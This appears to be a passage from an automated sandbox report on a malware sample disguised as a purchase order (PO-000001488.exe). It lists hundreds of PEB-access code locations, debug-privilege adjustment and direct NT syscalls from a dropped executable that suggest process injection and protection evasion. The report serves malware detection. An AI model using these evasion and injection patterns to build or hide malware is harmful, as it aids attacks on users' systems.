            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA197 mov eax, dword ptr fs:[00000030h]3_2_014CA197
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01556050 mov eax, dword ptr fs:[00000030h]3_2_01556050
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2050 mov eax, dword ptr fs:[00000030h]3_2_014D2050
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FC073 mov eax, dword ptr fs:[00000030h]3_2_014FC073
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01554000 mov ecx, dword ptr fs:[00000030h]3_2_01554000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01572000 mov eax, dword ptr fs:[00000030h]3_2_01572000
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE016 mov eax, dword ptr fs:[00000030h]3_2_014EE016
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566030 mov eax, dword ptr fs:[00000030h]3_2_01566030
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA020 mov eax, dword ptr fs:[00000030h]3_2_014CA020
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC020 mov eax, dword ptr fs:[00000030h]3_2_014CC020
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015520DE mov eax, dword ptr fs:[00000030h]3_2_015520DE
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015120F0 mov ecx, dword ptr fs:[00000030h]3_2_015120F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D80E9 mov eax, dword ptr fs:[00000030h]3_2_014D80E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA0E3 mov ecx, dword ptr fs:[00000030h]3_2_014CA0E3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015560E0 mov eax, dword ptr fs:[00000030h]3_2_015560E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC0F0 mov eax, dword ptr fs:[00000030h]3_2_014CC0F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D208A mov eax, dword ptr fs:[00000030h]3_2_014D208A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015960B8 mov eax, dword ptr fs:[00000030h]3_2_015960B8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015960B8 mov ecx, dword ptr fs:[00000030h]3_2_015960B8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015680A8 mov eax, dword ptr fs:[00000030h]3_2_015680A8
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01578350 mov ecx, dword ptr fs:[00000030h]3_2_01578350
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov ecx, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0155035C mov eax, dword ptr fs:[00000030h]3_2_0155035C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0159A352 mov eax, dword ptr fs:[00000030h]3_2_0159A352
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01552349 mov eax, dword ptr fs:[00000030h]3_2_01552349
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157437C mov eax, dword ptr fs:[00000030h]3_2_0157437C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A30B mov eax, dword ptr fs:[00000030h]3_2_0150A30B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CC310 mov ecx, dword ptr fs:[00000030h]3_2_014CC310
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F0310 mov ecx, dword ptr fs:[00000030h]3_2_014F0310
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015743D4 mov eax, dword ptr fs:[00000030h]3_2_015743D4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015743D4 mov eax, dword ptr fs:[00000030h]3_2_015743D4
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov ecx, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0157E3DB mov eax, dword ptr fs:[00000030h]3_2_0157E3DB
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA3C0 mov eax, dword ptr fs:[00000030h]3_2_014DA3C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D83C0 mov eax, dword ptr fs:[00000030h]3_2_014D83C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158C3CD mov eax, dword ptr fs:[00000030h]3_2_0158C3CD
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015563C0 mov eax, dword ptr fs:[00000030h]3_2_015563C0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E03E9 mov eax, dword ptr fs:[00000030h]3_2_014E03E9
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015063FF mov eax, dword ptr fs:[00000030h]3_2_015063FF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014EE3F0 mov eax, dword ptr fs:[00000030h]3_2_014EE3F0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F438F mov eax, dword ptr fs:[00000030h]3_2_014F438F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014F438F mov eax, dword ptr fs:[00000030h]3_2_014F438F
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CE388 mov eax, dword ptr fs:[00000030h]3_2_014CE388
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C8397 mov eax, dword ptr fs:[00000030h]3_2_014C8397
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A250 mov eax, dword ptr fs:[00000030h]3_2_0158A250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0158A250 mov eax, dword ptr fs:[00000030h]3_2_0158A250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D6259 mov eax, dword ptr fs:[00000030h]3_2_014D6259
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01558243 mov eax, dword ptr fs:[00000030h]3_2_01558243
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01558243 mov ecx, dword ptr fs:[00000030h]3_2_01558243
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014CA250 mov eax, dword ptr fs:[00000030h]3_2_014CA250
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C826B mov eax, dword ptr fs:[00000030h]3_2_014C826B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01580274 mov eax, dword ptr fs:[00000030h]3_2_01580274
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D4260 mov eax, dword ptr fs:[00000030h]3_2_014D4260
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014C823B mov eax, dword ptr fs:[00000030h]3_2_014C823B
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014DA2C3 mov eax, dword ptr fs:[00000030h]3_2_014DA2C3
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02E1 mov eax, dword ptr fs:[00000030h]3_2_014E02E1
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E284 mov eax, dword ptr fs:[00000030h]3_2_0150E284
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E284 mov eax, dword ptr fs:[00000030h]3_2_0150E284
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01550283 mov eax, dword ptr fs:[00000030h]3_2_01550283
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02A0 mov eax, dword ptr fs:[00000030h]3_2_014E02A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E02A0 mov eax, dword ptr fs:[00000030h]3_2_014E02A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov ecx, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015662A0 mov eax, dword ptr fs:[00000030h]3_2_015662A0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8550 mov eax, dword ptr fs:[00000030h]3_2_014D8550
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D8550 mov eax, dword ptr fs:[00000030h]3_2_014D8550
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150656A mov eax, dword ptr fs:[00000030h]3_2_0150656A
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01566500 mov eax, dword ptr fs:[00000030h]3_2_01566500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015A4500 mov eax, dword ptr fs:[00000030h]3_2_015A4500
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE53E mov eax, dword ptr fs:[00000030h]3_2_014FE53E
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014E0535 mov eax, dword ptr fs:[00000030h]3_2_014E0535
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A5D0 mov eax, dword ptr fs:[00000030h]3_2_0150A5D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150A5D0 mov eax, dword ptr fs:[00000030h]3_2_0150A5D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D65D0 mov eax, dword ptr fs:[00000030h]3_2_014D65D0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E5CF mov eax, dword ptr fs:[00000030h]3_2_0150E5CF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E5CF mov eax, dword ptr fs:[00000030h]3_2_0150E5CF
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014FE5E7 mov eax, dword ptr fs:[00000030h]3_2_014FE5E7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D25E0 mov eax, dword ptr fs:[00000030h]3_2_014D25E0
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C5ED mov eax, dword ptr fs:[00000030h]3_2_0150C5ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150C5ED mov eax, dword ptr fs:[00000030h]3_2_0150C5ED
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_0150E59C mov eax, dword ptr fs:[00000030h]3_2_0150E59C
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2582 mov eax, dword ptr fs:[00000030h]3_2_014D2582
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_014D2582 mov ecx, dword ptr fs:[00000030h]3_2_014D2582
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_01504588 mov eax, dword ptr fs:[00000030h]3_2_01504588
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015505A7 mov eax, dword ptr fs:[00000030h]3_2_015505A7
            Source: C:\Users\user\Desktop\PO-000001488.exeCode function: 3_2_015505A7 mov eax, dword ptr fs:[00000030h]3_2_015505A7
            Source: C:\Users\user\Desktop\PO-000001488.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\PO-000001488.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtCreateMutant: Direct from: 0x774635CC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtWriteVirtualMemory: Direct from: 0x77462E3C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtMapViewOfSection: Direct from: 0x77462D1C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtResumeThread: Direct from: 0x774636AC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtProtectVirtualMemory: Direct from: 0x77462F9C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtSetInformationProcess: Direct from: 0x77462C5C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtSetInformationThread: Direct from: 0x774563F9
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtNotifyChangeKey: Direct from: 0x77463C2C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtProtectVirtualMemory: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtAllocateVirtualMemory: Direct from: 0x77462BFC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQueryInformationProcess: Direct from: 0x77462C26
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtResumeThread: Direct from: 0x77462FBC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtReadFile: Direct from: 0x77462ADC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtQuerySystemInformation: Direct from: 0x77462DFC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtDelayExecution: Direct from: 0x77462DDC
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtAllocateVirtualMemory: Direct from: 0x77463C9C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtCreateUserProcess: Direct from: 0x7746371C
            Source: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe NtWriteVirtualMemory: Direct from: 0x7746490C
